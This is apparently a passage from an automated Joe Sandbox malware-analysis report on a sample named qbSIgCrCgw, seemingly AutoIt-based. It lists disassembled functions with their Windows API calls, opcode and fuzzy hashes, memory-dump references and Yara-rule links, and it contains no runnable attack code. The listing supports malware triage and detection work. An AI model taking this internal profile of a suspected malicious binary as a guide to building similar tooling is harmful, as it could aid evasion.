                                                                                • Opcode ID: 07cdc6d52fe463fd72ca06a47ff1789272bbc179074746f9c84bfa099295541c
                                                                                • Instruction ID: 8a5e5b3d9d02244d3ebbf23696106dc081d443615c843deed08778e5380ec6fd
                                                                                • Opcode Fuzzy Hash: 07cdc6d52fe463fd72ca06a47ff1789272bbc179074746f9c84bfa099295541c
                                                                                • Instruction Fuzzy Hash: AC113A31900029BBCB11DF98DC46DEEB7B9EB09305F400456F911E7140D334AA86CBA9
                                                                                Function 003F732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 003F7352
                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 003F7385
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003F739B
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003F73A2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2880819207-0
                                                                                • Opcode ID: adcf31f6a6391421e9e7184e9c91985900aa026380d0793abd8d0214d7cbd41c
                                                                                • Instruction ID: f351fd32ab2f5d122420effb772881fa6b9a8edfd51bdea382c0a96c1d06aec9
                                                                                • Opcode Fuzzy Hash: adcf31f6a6391421e9e7184e9c91985900aa026380d0793abd8d0214d7cbd41c
                                                                                • Instruction Fuzzy Hash: 71110476A04209BFC7029FACEC09AEE7BAD9B44311F144366F925D32A2D6708D009BA4
                                                                                Function 003CD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
                                                                                • GetStockObject.GDI32(00000011), ref: 003CD1CE
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                • String ID:
                                                                                • API String ID: 3970641297-0
                                                                                • Opcode ID: cb25860ec1bd60acda1acc18ef286e643197610d26c42ae204564da5e636fc6b
                                                                                • Instruction ID: 3edce8f8ee2ecc351ccebcf1627e431960eaa1d4f4f5fa596bed66cbb7d3e25b
                                                                                • Opcode Fuzzy Hash: cb25860ec1bd60acda1acc18ef286e643197610d26c42ae204564da5e636fc6b
                                                                                • Instruction Fuzzy Hash: 4211A972501509BFEF024FA0AC95FEABB6DFF09364F09012AFA1592160C731DC60EBA0
                                                                                Function 003E4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                • Instruction ID: d0f13c4e59efd531a927add27bceb68cdfd4d69cc2c79955978a7520d519bb4b
                                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                • Instruction Fuzzy Hash: 12014C3600019EBBCF135E86DC068EE3F27BB5C354B598655FE28590B1D336DAB1AB81
                                                                                Function 003D7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003D7A0D: __getptd_noexit.LIBCMT ref: 003D7A0E
                                                                                • __lock.LIBCMT ref: 003D748F
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 003D74AC
                                                                                • _free.LIBCMT ref: 003D74BF
                                                                                • InterlockedIncrement.KERNEL32(00F564A0), ref: 003D74D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 2704283638-0
                                                                                • Opcode ID: 4c17999c63e9b4953814a1fa9350ccaa633096616d38e2b2515d7b809a87ad46
                                                                                • Instruction ID: 10f6300d0be9e53c5107c092a66ea3b430609b0529dca8dbcadeb4675cf13b27
                                                                                • Opcode Fuzzy Hash: 4c17999c63e9b4953814a1fa9350ccaa633096616d38e2b2515d7b809a87ad46
                                                                                • Instruction Fuzzy Hash: 4E01AD3390AA21ABC713AF26B40675DBB70BB04710F16401BF8147B780FB246951CFCA
                                                                                Function 0041EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 003CAFE3
                                                                                  • Part of subcall function 003CAF83: SelectObject.GDI32(?,00000000), ref: 003CAFF2
                                                                                  • Part of subcall function 003CAF83: BeginPath.GDI32(?), ref: 003CB009
                                                                                  • Part of subcall function 003CAF83: SelectObject.GDI32(?,00000000), ref: 003CB033
                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0041EA8E
                                                                                • LineTo.GDI32(00000000,?,?), ref: 0041EA9B
                                                                                • EndPath.GDI32(00000000), ref: 0041EAAB
                                                                                • StrokePath.GDI32(00000000), ref: 0041EAB9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                • String ID:
                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 2f1e8fff8dc2306fe8f28832a48125dcda54aa32890655c21d1c7754c1f0cd6c
                                                                                • Instruction ID: c8994a9c2b410d8bbca4876638e6ee75c0ebb6ff5b1aac5bd83914c552aace53
                                                                                • Opcode Fuzzy Hash: 2f1e8fff8dc2306fe8f28832a48125dcda54aa32890655c21d1c7754c1f0cd6c
                                                                                • Instruction Fuzzy Hash: 02F0BE32405258BBDB129FA4AC09FCE3F29AF06714F044112FE01610F183B855A1CB9D
                                                                                Function 003EC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003EC84A
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 003EC85D
                                                                                • GetCurrentThreadId.KERNEL32 ref: 003EC864
                                                                                • AttachThreadInput.USER32(00000000), ref: 003EC86B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: 0f4c01b8d192416a2a56649eaf5632aabbff866244665dff8fb5f5bbc5447ac0
                                                                                • Instruction ID: b5752b4b2ec9e887f17afc5723bad9738ca92520103bb87696afb8df6f990c03
                                                                                • Opcode Fuzzy Hash: 0f4c01b8d192416a2a56649eaf5632aabbff866244665dff8fb5f5bbc5447ac0
                                                                                • Instruction Fuzzy Hash: 44E06D71941278BBDF211BA2EC0EEDB7F2CEF167A1F00A121B60D844A1C6B1C581DBE0
                                                                                Function 003EB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 003EB0D6
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,003EAC9D), ref: 003EB0DD
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,003EAC9D), ref: 003EB0EA
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,003EAC9D), ref: 003EB0F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: 43fecf1500f651515f474761171d037bc02e4346009bf236b2330021d286ccb5
                                                                                • Instruction ID: 90824749d10fef7b751e4d2a2e8f0e9b954c883b2b390d4f4a246df6b5d7dd43
                                                                                • Opcode Fuzzy Hash: 43fecf1500f651515f474761171d037bc02e4346009bf236b2330021d286ccb5
                                                                                • Instruction Fuzzy Hash: 73E08632F012219BD7211FB26D0CB4B7BBCEF55B95F128938F641E6080DB349801CB64
                                                                                Function 003CB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 003CB496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 003CB4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 003CB4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 003CB4BD
                                                                                • GetWindowDC.USER32(?,00000000), ref: 0042DE2B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0042DE38
                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0042DE51
                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0042DE6A
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0042DE8A
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0042DE95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 1946975507-0
                                                                                • Opcode ID: c2de6114020213faa751fa01985f926ca36388b3f05e2ed62aacaf6e11618766
                                                                                • Instruction ID: a8d460fbe55c17b6fcdf65d4adc614964db61abe1227f7ec9bc1e1f4b2a6c775
                                                                                • Opcode Fuzzy Hash: c2de6114020213faa751fa01985f926ca36388b3f05e2ed62aacaf6e11618766
                                                                                • Instruction Fuzzy Hash: DEE06D31A00240ABDF211F64BC09BD97B21AB11335F10C226F679980E2C7714980CB15
                                                                                Function 0042B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 8532686f169117a1ec01c987de1356f4d86684e04ca53c432dbac52e94f05eb3
                                                                                • Instruction ID: f65fc19cfc5032d22554f55574638120cd2604f20a2d91381646cb1e2fbfb1d0
                                                                                • Opcode Fuzzy Hash: 8532686f169117a1ec01c987de1356f4d86684e04ca53c432dbac52e94f05eb3
                                                                                • Instruction Fuzzy Hash: 1DE04FB5900204EFDB015F70E84DA2E7BA8EF4C350F11D82AFC6ACB250CB7598418B58
                                                                                Function 003EB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003EB2DF
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 003EB2EB
                                                                                • CloseHandle.KERNEL32(?), ref: 003EB2F4
                                                                                • CloseHandle.KERNEL32(?), ref: 003EB2FC
                                                                                  • Part of subcall function 003EAB24: GetProcessHeap.KERNEL32(00000000,?,003EA848), ref: 003EAB2B
                                                                                  • Part of subcall function 003EAB24: HeapFree.KERNEL32(00000000), ref: 003EAB32
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: 481ec3ae22d95ca6196370e999ffc6c0cb202ab2c411829dfcb078e0c965b59d
                                                                                • Instruction ID: 6fd9c3c7828cef7d53d991a36c23843046c73aadc4066fdb93b7eb3a69155854
                                                                                • Opcode Fuzzy Hash: 481ec3ae22d95ca6196370e999ffc6c0cb202ab2c411829dfcb078e0c965b59d
                                                                                • Instruction Fuzzy Hash: 05E0BF36504405BBCB012B95EC08859FB76FF883213109231F61581571CB32A871EB95
                                                                                Function 0042B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: c65c509e8534c394d66b50944d17e616c18969eb5558d96d58cf21132fa832d2
                                                                                • Instruction ID: 7b7a9e548890d6edfac58ee0a6e63bba88960086aa5926d649a06ab416cb4184
                                                                                • Opcode Fuzzy Hash: c65c509e8534c394d66b50944d17e616c18969eb5558d96d58cf21132fa832d2
                                                                                • Instruction Fuzzy Hash: E2E046B1900200EFDB015F70E849A2D7BA8EB4C350F11D829F96ECB260CB79A8008B08
                                                                                Function 003EDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 003EDEAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ContainedObject
                                                                                • String ID: AutoIt3GUI$Container
                                                                                • API String ID: 3565006973-3941886329
                                                                                • Opcode ID: 87075b3f44855aa511f3d9d299c598436438ef952a91d8e3ab8202a975b94a2d
                                                                                • Instruction ID: 8be7e5ae938e02ce17ee400ce1a54a79993204e40d212233fc72f4bf293d2174
                                                                                • Opcode Fuzzy Hash: 87075b3f44855aa511f3d9d299c598436438ef952a91d8e3ab8202a975b94a2d
                                                                                • Instruction Fuzzy Hash: 2A913870600611AFDB15DF65C884F6AB7B9BF49710F20866EF94ACF691DB70E841CB50
                                                                                Function 003F290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy
                                                                                • String ID: I/B$I/B
                                                                                • API String ID: 3048848545-1122223593
                                                                                • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                • Instruction ID: 534f4319a50545cb41868b683962f79a32bd119dc631dc1e6977d1e9e76916a1
                                                                                • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                • Instruction Fuzzy Hash: B741D63190021EEACF27EF98D441AFFB7B4EF48714F51505AEA81AB191DB705E92C760
                                                                                Function 003CBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 003CBCDA
                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 003CBCF3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: d2bcb7dd5f91910b00ba9bff32202bbefdc78c014709878a3ceb7ac509e10c9e
                                                                                • Instruction ID: 9a973d572b7b7ebe4b69595f598200f8cc0b25f635af471b6ae1ca52ca5afbaa
                                                                                • Opcode Fuzzy Hash: d2bcb7dd5f91910b00ba9bff32202bbefdc78c014709878a3ceb7ac509e10c9e
                                                                                • Instruction Fuzzy Hash: 8B513571408744ABE321AF14D886FAFBBE8FB94354F41485EF1C8850A2EF7099A88756
                                                                                Function 003FC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003B44ED: __fread_nolock.LIBCMT ref: 003B450B
                                                                                • _wcscmp.LIBCMT ref: 003FC65D
                                                                                • _wcscmp.LIBCMT ref: 003FC670
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                • String ID: FILE
                                                                                • API String ID: 4029003684-3121273764
                                                                                • Opcode ID: 108a7a1a0c43df2849250f1cbb64f3bc27f4da90f8b71f6093d3cc8b96bead91
                                                                                • Instruction ID: e811273b30229e0074c59c91d1ac448e6a8752f13bbd1145d29407fb326f5185
                                                                                • Opcode Fuzzy Hash: 108a7a1a0c43df2849250f1cbb64f3bc27f4da90f8b71f6093d3cc8b96bead91
                                                                                • Instruction Fuzzy Hash: 5841D272A4420EBBDF229AA4DC42FEF77B9AF49714F00006AF705EB181D6749A04CB65
                                                                                Function 0041A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0041A85A
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0041A86F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
